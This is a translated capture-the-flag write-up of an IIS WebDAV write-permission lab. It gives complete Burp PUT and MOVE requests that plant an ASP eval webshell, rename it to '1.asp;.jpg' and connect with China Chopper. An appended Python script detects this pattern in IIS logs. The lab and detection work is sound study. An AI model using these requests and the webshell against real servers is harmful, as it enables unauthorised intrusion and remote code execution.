[WEB] IIS Write-Permission Vulnerability: Analysis and Tracing

清疚 2022-05-16 09:46

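[Original challenge] https://www.mozhe.cn/bug/detail/VnRjUTVETHFXWk5URWNjV2VpVWhRQT09bW96aGUmozhe

[Solution]

1. First, an IIS scanner reports a PUT vulnerability, but the tool itself cannot be used to inject the file.

2. Try capturing the request in Burp and modifying it to perform the write: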

    PUT /test.txt HTTP/1.1
    Host: 219.153.49.228:43672
    Pragma: no-cache
    Cache-Control: no-cache
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 UBrowser/6.2.4094.1 Safari/537.36
    Accept: */*
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US
    Connection: close
    Content-Length: 23

    <%eval request("123")%>

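A 207 response indicates that the write succeeded.

3. Rename the one-liner file. Taking advantage of the IIS vulnerability, we rename it to 1.asp;.jpg.

Send the following with Burp: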

    MOVE /test.txt HTTP/1.1
    Host: 219.153.49.228:43672
    Destination: /1.asp;.jpg
    Pragma: no-cache
    Cache-Control: no-cache
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 UBrowser/6.2.4094.1 Safari/537.36
    Accept: */*
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US
    Connection: close
    Content-Length: 23

    <%eval request("123")%>

Although the response is 207 Multi-Status, the file is indeed accessible; simply connect to it with Caidao (China Chopper).
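
A log-side check for the sequence above, as an added example that is not part of the original post: it scans IIS W3C extended log lines for successful WebDAV writes (PUT/MOVE/COPY) and for requests to names with a script extension followed by `;`, as in `1.asp;.jpg`. The log lines, field selection, client addresses and the extension list are constructed assumptions.

```python
import re

# Constructed IIS W3C extended log sample (documentation addresses, not from the post).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2022-05-16 09:40:01 198.51.100.7 GET /index.asp 200
2022-05-16 09:41:10 203.0.113.9 PUT /test.txt 201
2022-05-16 09:41:25 203.0.113.9 MOVE /test.txt 207
2022-05-16 09:42:02 203.0.113.9 POST /1.asp;.jpg 200
2022-05-16 09:43:00 198.51.100.7 PUT /upload.txt 403
"""

WRITE_METHODS = {"PUT", "MOVE", "COPY"}
# Script extension followed by ';', the naming used in step 3 of the post.
# Assumption: these are the extensions mapped to the ASP handler on the server.
SEMICOLON_SCRIPT = re.compile(r"\.(asp|asa|cer|cdx);", re.IGNORECASE)

def parse_w3c(text):
    """Yield one dict per log record, keyed by the names in the #Fields line."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))

def find_webdav_write_abuse(text):
    """Return (kind, client_ip, method, uri_stem) tuples for suspicious records."""
    findings, writers = [], set()
    for rec in parse_w3c(text):
        if not rec["sc-status"].isdigit():
            continue
        ip, method = rec["c-ip"], rec["cs-method"].upper()
        stem, status = rec["cs-uri-stem"], int(rec["sc-status"])
        if not 200 <= status < 300:
            continue  # rejected requests did not change anything on disk
        if method in WRITE_METHODS:
            writers.add(ip)
            findings.append(("webdav-write", ip, method, stem))
        if SEMICOLON_SCRIPT.search(stem):
            kind = "semicolon-script-after-write" if ip in writers else "semicolon-script"
            findings.append((kind, ip, method, stem))
    return findings

if __name__ == "__main__":
    for finding in find_webdav_write_abuse(SAMPLE_LOG):
        print(finding)
```

The W3C log records the source path of a MOVE in `cs-uri-stem`, not the `Destination` header, so the renamed file only shows up once it is requested; that is why the check correlates by client address.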
